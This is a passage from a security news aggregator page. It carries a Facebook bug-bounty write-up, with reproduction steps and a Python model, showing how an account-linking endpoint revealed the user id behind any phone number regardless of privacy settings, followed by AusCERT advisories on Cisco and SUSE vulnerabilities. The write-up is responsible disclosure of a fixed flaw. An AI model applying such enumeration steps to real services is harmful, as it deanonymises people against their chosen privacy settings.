Malware Devil

Thursday, May 6, 2021

Identify a Facebook user by his phone number despite privacy settings set

Description

This bug could allow an attacker to determine whether a phone number is linked to a Facebook user account and, if so, the id of that user. While adding a phone number to the attacker's own Facebook account on m.facebook.com, the endpoint m.facebook.com/phoneacquire/ returned the current owner of the phone number regardless of the privacy settings that owner had set.

Reproduction Steps

1) From the attacker account, go to https://m.facebook.com/ntdelegatescreen/?params={"saved":true}&path=/contacts/management/
2) Add the phone number you want to check for a linked Facebook account.
3) You are then redirected to the https://m.facebook.com/phoneacqwrite/ endpoint. Among the parameters attached to that redirect is giver_id, which is the user id of the Facebook user who has this phone number on their account.
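The leak above, modelled as an added example (not Facebook's code and not the reporter's): a handler that always returns giver_id, beside a hardened two-step flow that answers identically whether or not the number is in use (the add flow itself was an existence oracle) and reveals the owner only after the requester has verified the number and only when the owner's lookup setting already permits it. The user records, the privacy-setting names, the verification-code step and every function name are assumptions.

```python
"""Model of the phoneacquire leak described above, beside a hardened flow.

Added illustration; not Facebook's code and not the reporter's. The user
records, the privacy-setting names, the verification-code step and every
function name here are assumptions. Only the observed behaviour (the
redirect parameters carrying the number's current owner as giver_id)
comes from the report.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Set, Tuple

# Assumed levels of the "who can look me up using this phone number" setting.
EVERYONE, FRIENDS, ONLY_ME = "everyone", "friends", "only_me"


@dataclass
class User:
    user_id: int
    phone: Optional[str] = None
    phone_lookup: str = EVERYONE
    friends: Set[int] = field(default_factory=set)


# Constructed sample accounts; ids and numbers are made up.
USERS: Dict[int, User] = {
    1001: User(1001, "+15550100001", ONLY_ME),
    1002: User(1002, "+15550100002", FRIENDS, friends={2000}),
    1003: User(1003, "+15550100003", EVERYONE),
    2000: User(2000, None),                 # the account adding numbers
}
PHONE_INDEX: Dict[str, int] = {u.phone: u.user_id for u in USERS.values() if u.phone}

# Pending verification codes keyed by (requester, phone). A real system
# delivers the code over SMS; here pending_code() stands in for delivery.
PENDING: Dict[Tuple[int, str], str] = {}


def normalise(phone: str) -> str:
    """Drop spaces, dashes and parentheses so formatting variants match."""
    return "".join(ch for ch in phone if ch.isdigit() or ch == "+")


def phone_acquire_vulnerable(requester_id: int, phone: str) -> dict:
    """Behaviour the report describes: when the number is already in use the
    response carries the owner's id, whatever that owner's setting says."""
    owner_id = PHONE_INDEX.get(normalise(phone))
    if owner_id is None:
        return {"status": "added"}
    return {"status": "conflict", "giver_id": owner_id}


def owner_visible_to(owner: User, requester_id: int) -> bool:
    """Apply the owner's lookup setting to the account asking."""
    if owner.phone_lookup == EVERYONE:
        return True
    if owner.phone_lookup == FRIENDS:
        return requester_id in owner.friends
    return False


def request_add(requester_id: int, phone: str) -> dict:
    """Hardened step 1: the response is the same whether or not the number
    is in use, so the add flow no longer confirms that a number has an
    account (an existence oracle the vulnerable handler also had)."""
    key = (requester_id, normalise(phone))
    PENDING[key] = f"{secrets.randbelow(10**6):06d}"
    return {"status": "verification_sent"}


def pending_code(requester_id: int, phone: str) -> Optional[str]:
    """Stand-in for reading the SMS the requester received."""
    return PENDING.get((requester_id, normalise(phone)))


def confirm_add(requester_id: int, phone: str, code: str) -> dict:
    """Hardened step 2: only once the requester has proved control of the
    number is a conflict reported, and giver_id is included only when the
    owner's setting would let this requester find them anyway."""
    key = (requester_id, normalise(phone))
    expected = PENDING.get(key)
    if expected is None or not hmac.compare_digest(expected.encode(), code.encode()):
        return {"status": "invalid_code"}
    del PENDING[key]
    owner_id = PHONE_INDEX.get(key[1])
    if owner_id is None:
        return {"status": "added"}
    resp = {"status": "conflict"}
    if owner_visible_to(USERS[owner_id], requester_id):
        resp["giver_id"] = owner_id
    return resp
```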

Impact

This could have been misused to deanonymize or identify the Facebook user account linked to a given phone number.

Timeline

Mar 13, 2021 - Report sent
Mar 17, 2021 - Acknowledged by Facebook
Apr 7, 2021 - Fixed by Facebook
Apr 26, 2021 - $9K bounty awarded by Facebook (including bonus)

The post Identify a Facebook user by his phone number despite privacy settings set appeared first on Malware Devil.



https://malwaredevil.com/2021/05/06/identify-a-facebook-user-by-his-phone-number-despite-privacy-settings-set/?utm_source=rss&utm_medium=rss&utm_campaign=identify-a-facebook-user-by-his-phone-number-despite-privacy-settings-set

What are the most common types of cyberattacks?

To protect ourselves, we need to understand how a threat works and where it comes from. Cyberthreats are malicious attempts against an organisation or individual to obtain sensitive data and use it for the attacker's own benefit.

These criminals use a variety …

The post Quais são os tipos mais comuns de ciberataques? appeared first on ManageEngine Blog.

The post Quais são os tipos mais comuns de ciberataques? appeared first on Security Boulevard.

The post Quais são os tipos mais comuns de ciberataques? appeared first on Malware Devil.



https://malwaredevil.com/2021/05/06/quais-sao-os-tipos-mais-comuns-de-ciberataques/?utm_source=rss&utm_medium=rss&utm_campaign=quais-sao-os-tipos-mais-comuns-de-ciberataques

DevOps Connect at RSAC 2021: Insightful Talks, Live Q&A, Workshops, Pilates and More

We are excited to announce the return of DevOps Connect: DevSecOps Virtual Summit on May 19, as part of the RSA Conference 2021. This year, internationally recognized speakers will take a deep dive into “Securing the Cloud Native World.” DevOps Connect is a full-day event, featuring four different content tracks, with more than 50 speakers…

The post DevOps Connect at RSAC 2021: Insightful Talks, Live Q&A, Workshops, Pilates and More appeared first on Security Boulevard.

The post DevOps Connect at RSAC 2021: Insightful Talks, Live Q&A, Workshops, Pilates and More appeared first on Malware Devil.



https://malwaredevil.com/2021/05/06/devops-connect-at-rsac-2021-insightful-talks-live-qa-workshops-pilates-and-more/?utm_source=rss&utm_medium=rss&utm_campaign=devops-connect-at-rsac-2021-insightful-talks-live-qa-workshops-pilates-and-more

ESB-2021.1548 – [Win] Cisco Webex Meetings Desktop App: Access privileged data – Existing account

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1548
Cisco Webex Meetings Desktop App for Windows Shared Memory
Information Disclosure Vulnerability
6 May 2021

===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product: Cisco Webex Meetings Desktop App
Publisher: Cisco Systems
Operating System: Windows
Impact/Access: Access Privileged Data -- Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2020-3347

Reference: ESB-2020.2116.4

Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-NBmqM9vt

- --------------------------BEGIN INCLUDED TEXT--------------------

Cisco Webex Meetings Desktop App for Windows Shared Memory Information
Disclosure Vulnerability

Priority: Medium
Advisory ID: cisco-sa-webex-client-NBmqM9vt
First Published: 2020 June 17 16:00 GMT
Last Updated: 2021 May 5 15:31 GMT
Version 1.5: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvt99384 CSCvu05505
CVE Names: CVE-2020-3347
CWEs: CWE-200

CVSS Score:
5.5 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X

Summary

o A vulnerability in Cisco Webex Meetings Desktop App for Windows could allow
an authenticated, local attacker to gain access to sensitive information on
an affected system.

The vulnerability is due to unsafe usage of shared memory that is used by
the affected software. An attacker with permissions to view system memory
could exploit this vulnerability by running an application on the local
system that is designed to read shared memory. A successful exploit could
allow the attacker to retrieve sensitive information from the shared
memory, including usernames, meeting information, or authentication tokens
that could aid the attacker in future attacks.

Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-NBmqM9vt

Affected Products

o Vulnerable Products

At the time of publication, this vulnerability affected Cisco Webex
Meetings Desktop App for Windows releases earlier than 41.2.

See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.

Products Confirmed Not Vulnerable

Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.

Details

o Cisco Webex Meetings Desktop App uses shared memory to exchange information
with the Windows operating system and other applications. The software may
store sensitive information, such as usernames, meeting information, and
authentication tokens, in this shared memory space. Other users on the local
system could retrieve this information from within the shared memory space
and use it for additional attacks.

Workarounds

o There are no workarounds that address this vulnerability.

Fixed Software

o When considering software upgrades, customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories and Alerts page, to determine exposure and a
complete upgrade solution.

In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.

Fixed Releases

At the time of publication, the following releases contained the fix for
this vulnerability:

Cisco Webex Product                                    Fixed Release
Cisco Webex Meetings Desktop App for Windows           41.2 and later
Cisco Webex Meetings Desktop App for Windows,          39.5.26 and later
  lockdown versions
Cisco Webex Meetings Server                            3.0 MR3 Security Patch 3 and later
                                                       4.0 MR3 Security Patch 2 and later

See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.

Exploitation and Public Announcements

o The Cisco Product Security Incident Response Team (PSIRT) is aware that
proof-of-concept exploit code is available for the vulnerability that is
described in this advisory.

The Cisco PSIRT is not aware of any malicious use of the vulnerability that
is described in this advisory.

Source

o Cisco would like to thank Martin Rakhmanov of Trustwave for reporting this
vulnerability.

Cisco Security Vulnerability Policy

o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy. This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.

URL

o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-NBmqM9vt

Revision History

o +---------+---------------------------+------------+--------+-------------+
  | Version | Description               | Section    | Status | Date        |
  +---------+---------------------------+------------+--------+-------------+
  |         | Updated vulnerable        | Vulnerable |        |             |
  | 1.5     | releases and fixed        | Products,  | Final  | 2021-MAY-05 |
  |         | releases.                 | Fixed      |        |             |
  |         |                           | Software   |        |             |
  +---------+---------------------------+------------+--------+-------------+
  |         | Added Cisco bug ID for    |            |        |             |
  | 1.4     | Cisco Webex Meetings      | -          | Final  | 2020-JUL-10 |
  |         | Server.                   |            |        |             |
  +---------+---------------------------+------------+--------+-------------+
  |         | Added update information  | Fixed      |        |             |
  | 1.3     | for Cisco Webex Meetings  | Software   | Final  | 2020-JUL-07 |
  |         | Server.                   |            |        |             |
  +---------+---------------------------+------------+--------+-------------+
  |         | Included additional fix   | Vulnerable |        |             |
  | 1.2     | information for the Cisco | Products,  | Final  | 2020-JUN-23 |
  |         | Webex Desktop App release | Fixed      |        |             |
  |         | 40.4.12.                  | Software   |        |             |
  +---------+---------------------------+------------+--------+-------------+
  |         | Clarified affected        |            |        |             |
  | 1.1     | versions of Cisco Webex   | Affected   | Final  | 2020-JUN-17 |
  |         | Meetings Desktop App for  | Products   |        |             |
  |         | Windows.                  |            |        |             |
  +---------+---------------------------+------------+--------+-------------+
  | 1.0     | Initial public release.   | -          | Final  | 2020-JUN-17 |
  +---------+---------------------------+------------+--------+-------------+

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
The post ESB-2021.1548 – [Win] Cisco Webex Meetings Desktop App: Access privileged data – Existing account appeared first on Malware Devil.



https://malwaredevil.com/2021/05/06/esb-2021-1548-win-cisco-webex-meetings-desktop-app-access-privileged-data-existing-account/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1548-win-cisco-webex-meetings-desktop-app-access-privileged-data-existing-account

ESB-2021.1549 – [Cisco] Cisco Wide Area Application Services (WAAS): Access confidential data – Existing account

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1549
Cisco Wide Area Application Services Software Information
Disclosure Vulnerability
6 May 2021

===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product: Cisco Wide Area Application Services (WAAS)
Publisher: Cisco Systems
Operating System: Cisco
Impact/Access: Access Confidential Data -- Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-1438

Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-waas-infdisc-Twb4EypK

- --------------------------BEGIN INCLUDED TEXT--------------------

Cisco Wide Area Application Services Software Information Disclosure
Vulnerability

Priority: Medium
Advisory ID: cisco-sa-waas-infdisc-Twb4EypK
First Published: 2021 May 5 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvw97364
CVE Names: CVE-2021-1438
CWEs: CWE-668

Summary

o A vulnerability in Cisco Wide Area Application Services (WAAS) Software
could allow an authenticated, local attacker to gain access to sensitive
information on an affected device.

The vulnerability is due to improper input validation and authorization of
specific commands that a user can execute within the CLI. An attacker could
exploit this vulnerability by authenticating to an affected device and
issuing a specific set of commands. A successful exploit could allow the
attacker to read arbitrary files that they originally did not have
permissions to access.

Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-waas-infdisc-Twb4EypK

Affected Products

o Vulnerable Products

This vulnerability affects Cisco Wide Area Application Services releases
6.4.5a and earlier.

See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.

Products Confirmed Not Vulnerable

Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.

Workarounds

o There are no workarounds that address this vulnerability.

Fixed Software

o When considering software upgrades, customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page, to determine exposure and a complete
upgrade solution.

In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.

Fixed Releases

Cisco Wide Area Application Services releases 6.4.5c and later contain the
fix for this vulnerability.

See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.

Exploitation and Public Announcements

o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerability that is
described in this advisory.

Source

o This vulnerability was found during internal security testing.

Cisco Security Vulnerability Policy

o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy. This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.

URL

o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-waas-infdisc-Twb4EypK

Revision History

o +----------+---------------------------+----------+--------+--------------+
  | Version  | Description               | Section  | Status | Date         |
  +----------+---------------------------+----------+--------+--------------+
  | 1.0      | Initial public release.   | -        | Final  | 2021-MAY-05  |
  +----------+---------------------------+----------+--------+--------------+

- --------------------------END INCLUDED TEXT--------------------

The post ESB-2021.1549 – [Cisco] Cisco Wide Area Application Services (WAAS): Access confidential data – Existing account appeared first on Malware Devil.



https://malwaredevil.com/2021/05/06/esb-2021-1549-cisco-cisco-wide-area-application-services-waas-access-confidential-data-existing-account/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1549-cisco-cisco-wide-area-application-services-waas-access-confidential-data-existing-account

ESB-2021.1550 – [Mac] Cisco AnyConnect Secure Mobility Client: Root compromise – Existing account

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1550
MacOS Local Privilege Escalation Exploitable through Cisco
AnyConnect Secure Mobility Client
6 May 2021

===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product: Cisco AnyConnect Secure Mobility Client
Publisher: Cisco Systems
Operating System: Mac OS
Impact/Access: Root Compromise -- Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2020-9817

Reference: ESB-2020.1859

Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-mac-priv-esc-VqST2nrT

- --------------------------BEGIN INCLUDED TEXT--------------------

MacOS Local Privilege Escalation Exploitable through Cisco AnyConnect Secure
Mobility Client

Priority: Informational
Advisory ID: cisco-sa-anyconnect-mac-priv-esc-VqST2nrT
First Published: 2021 May 5 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available

Summary

o On May 26, 2020, Apple released a security update for MacOS Catalina,
Mojave, and High Sierra. Part of this update addressed a local privilege
escalation vulnerability (CVE-2020-9817).

Cisco has determined that Cisco AnyConnect Secure Mobility Client releases
4.10.00093 and earlier could be used to exploit this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-mac-priv-esc-VqST2nrT

Details

o The MacOS Installer process extracts the contents of an application package
to a temporary folder before execution. Instead of assigning ownership of
these files to the root user, the original UID from the developer’s system
is maintained. A local attacker with the same UID as the extracted files
could modify them to execute code on the underlying operating system with
root privileges.

Additional information about this vulnerability is available at the
following links:

About the security content of macOS Catalina 10.15.5, Security Update
2020-003 Mojave, Security Update 2020-003 High Sierra
Technical Advisory – macOS Installer Local Root Privilege Escalation
(CVE-2020-9817)

Recommendations

o Cisco customers are advised to apply the Apple security update on all
affected operating systems where Cisco applications or products are
running.

Cisco will update Cisco AnyConnect Secure Mobility Client in the next
release to address this MacOS Installer vulnerability.

Source

o Cisco would like to thank the Lockheed Martin Red Team for reporting this
vulnerability.

Cisco Security Vulnerability Policy

o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy. This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.

URL

o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-anyconnect-mac-priv-esc-VqST2nrT

Revision History

o +----------+---------------------------+----------+--------+--------------+
  | Version  | Description               | Section  | Status | Date         |
  +----------+---------------------------+----------+--------+--------------+
  | 1.0      | Initial public release.   | -        | Final  | 2021-MAY-05  |
  +----------+---------------------------+----------+--------+--------------+

- --------------------------END INCLUDED TEXT--------------------

The post ESB-2021.1550 – [Mac] Cisco AnyConnect Secure Mobility Client: Root compromise – Existing account appeared first on Malware Devil.



https://malwaredevil.com/2021/05/06/esb-2021-1550-mac-cisco-anyconnect-secure-mobility-client-root-compromise-existing-account/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1550-mac-cisco-anyconnect-secure-mobility-client-root-compromise-existing-account

ESB-2021.1551 – [Cisco] Cisco Content Security Management Appliance (SMA): Root compromise – Existing account

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1551
Cisco Content Security Management Appliance Privilege
Escalation Vulnerability
6 May 2021

===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product: Cisco Content Security Management Appliance (SMA)
Publisher: Cisco Systems
Operating System: Cisco
Impact/Access: Root Compromise -- Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-1447

Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-priv-esc-JJ8zxQsC

- --------------------------BEGIN INCLUDED TEXT--------------------

Cisco Content Security Management Appliance Privilege Escalation Vulnerability

Priority: Medium
Advisory ID: cisco-sa-sma-priv-esc-JJ8zxQsC
First Published: 2021 May 5 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvx14681
CVE Names: CVE-2021-1447
CWEs: CWE-269

Summary

o A vulnerability in the user account management system of Cisco AsyncOS for
Cisco Content Security Management Appliance (SMA) could allow an
authenticated, local attacker to elevate their privileges to root.

This vulnerability is due to a procedural flaw in the password generation
algorithm. An attacker could exploit this vulnerability by enabling
specific Administrator-only features and connecting to the appliance
through the CLI with elevated privileges. A successful exploit could allow
the attacker to execute arbitrary commands as root and access the
underlying operating system. To exploit this vulnerability, the attacker
must have valid Administrator credentials.

Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-priv-esc-JJ8zxQsC

Affected Products

o Vulnerable Products

At the time of publication, this vulnerability affected Cisco SMA, both
physical and virtual, releases earlier than Release 12.8.1-002 and Release
13.8.1-068.

See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.

Products Confirmed Not Vulnerable

Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.

Cisco has confirmed that this vulnerability does not affect the following
Cisco products:

Web Security Appliance (WSA), both physical and virtual
Email Security Appliance (ESA), both physical and virtual

Workarounds

o There are no workarounds that address this vulnerability.

Fixed Software

o When considering software upgrades, customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page, to determine exposure and a complete
upgrade solution.

In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.

Fixed Releases

At the time of publication, Cisco SMA releases 12.8.1-002 and later and
13.8.1-068 and later contained the fix for this vulnerability.

See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.

Exploitation and Public Announcements

o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerability that is
described in this advisory.

Source

o This vulnerability was found by Jakub Bros of Cisco during internal
security testing.

Cisco Security Vulnerability Policy

o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy. This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.

URL

o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-priv-esc-JJ8zxQsC

Revision History

o +----------+---------------------------+----------+--------+--------------+
  | Version  | Description               | Section  | Status | Date         |
  +----------+---------------------------+----------+--------+--------------+
  | 1.0      | Initial public release.   | -        | Final  | 2021-MAY-05  |
  +----------+---------------------------+----------+--------+--------------+

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
-----END PGP SIGNATURE-----

https://malwaredevil.com/2021/05/06/esb-2021-1551-cisco-cisco-content-security-management-appliance-sma-root-compromise-existing-account/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1551-cisco-cisco-content-security-management-appliance-sma-root-compromise-existing-account

ESB-2021.1552 – [SUSE] openexr: Denial of service – Remote/unauthenticated

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1552
Security update for openexr
6 May 2021

===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product: openexr
Publisher: SUSE
Operating System: SUSE
Impact/Access: Denial of Service -- Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2021-26260 CVE-2021-23215 CVE-2021-20296
CVE-2021-3479 CVE-2021-3477

Reference: ESB-2021.1132

Original Bulletin:
https://www.suse.com/support/update/announcement/2021/suse-su-20211489-1

- --------------------------BEGIN INCLUDED TEXT--------------------

SUSE Security Update: Security update for openexr

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:1489-1
Rating: important
References: #1184353 #1184354 #1184355 #1185216 #1185217
Cross-References: CVE-2021-20296 CVE-2021-23215 CVE-2021-26260 CVE-2021-3477
CVE-2021-3479
Affected Products:
SUSE Linux Enterprise Module for Desktop Applications 15-SP3
SUSE Linux Enterprise Module for Desktop Applications 15-SP2
______________________________________________________________________________

An update that fixes 5 vulnerabilities is now available.

Description:

This update for openexr fixes the following issues:

o CVE-2021-23215: Fixed an integer-overflow in
Imf_2_5:DwaCompressor:initializeBuffers (bsc#1185216).
o CVE-2021-26260: Fixed an Integer-overflow in
Imf_2_5:DwaCompressor:initializeBuffers (bsc#1185217).
o CVE-2021-20296: Fixed a Null Pointer dereference in Imf_2_5:hufUncompress
(bsc#1184355).
o CVE-2021-3477: Fixed a Heap-buffer-overflow in
Imf_2_5::DeepTiledInputFile::readPixelSampleCounts (bsc#1184353).
o CVE-2021-3479: Fixed an Out-of-memory caused by allocation of a very large
buffer (bsc#1184354).

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:

o SUSE Linux Enterprise Module for Desktop Applications 15-SP3:
zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-SP3-2021-1489=1
o SUSE Linux Enterprise Module for Desktop Applications 15-SP2:
zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-SP2-2021-1489=1

Package List:

o SUSE Linux Enterprise Module for Desktop Applications 15-SP3 (aarch64
ppc64le s390x x86_64):
libIlmImf-2_2-23-2.2.1-3.27.1
libIlmImf-2_2-23-debuginfo-2.2.1-3.27.1
libIlmImfUtil-2_2-23-2.2.1-3.27.1
libIlmImfUtil-2_2-23-debuginfo-2.2.1-3.27.1
openexr-debuginfo-2.2.1-3.27.1
openexr-debugsource-2.2.1-3.27.1
openexr-devel-2.2.1-3.27.1
o SUSE Linux Enterprise Module for Desktop Applications 15-SP2 (aarch64
ppc64le s390x x86_64):
libIlmImf-2_2-23-2.2.1-3.27.1
libIlmImf-2_2-23-debuginfo-2.2.1-3.27.1
libIlmImfUtil-2_2-23-2.2.1-3.27.1
libIlmImfUtil-2_2-23-debuginfo-2.2.1-3.27.1
openexr-debuginfo-2.2.1-3.27.1
openexr-debugsource-2.2.1-3.27.1
openexr-devel-2.2.1-3.27.1

References:

o https://www.suse.com/security/cve/CVE-2021-20296.html
o https://www.suse.com/security/cve/CVE-2021-23215.html
o https://www.suse.com/security/cve/CVE-2021-26260.html
o https://www.suse.com/security/cve/CVE-2021-3477.html
o https://www.suse.com/security/cve/CVE-2021-3479.html
o https://bugzilla.suse.com/1184353
o https://bugzilla.suse.com/1184354
o https://bugzilla.suse.com/1184355
o https://bugzilla.suse.com/1185216
o https://bugzilla.suse.com/1185217

- --------------------------END INCLUDED TEXT--------------------


https://malwaredevil.com/2021/05/06/esb-2021-1552-suse-openexr-denial-of-service-remote-unauthenticated/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1552-suse-openexr-denial-of-service-remote-unauthenticated

ESB-2021.1553 – [UNIX/Linux][SUSE] p7zip: Denial of service – Existing account

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.1553
Security update for p7zip
6 May 2021

===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product: p7zip
Publisher: SUSE
Operating System: SUSE
UNIX variants (UNIX, Linux, OSX)
Impact/Access: Denial of Service -- Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-3465

Original Bulletin:
https://www.suse.com/support/update/announcement/2021/suse-su-20211491-1

Comment: This advisory references vulnerabilities in products which run on
platforms other than SUSE. It is recommended that administrators
running p7zip check for an updated version of the software for their
operating system.

- --------------------------BEGIN INCLUDED TEXT--------------------

SUSE Security Update: Security update for p7zip

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:1491-1
Rating: moderate
References: #1184699
Cross-References: CVE-2021-3465
Affected Products:
SUSE Linux Enterprise Module for Basesystem 15-SP3
SUSE Linux Enterprise Module for Basesystem 15-SP2
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for p7zip fixes the following issues:

o CVE-2021-3465: Fixed a NULL pointer dereference in
NCompress:CCopyCoder:Code (bsc#1184699)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
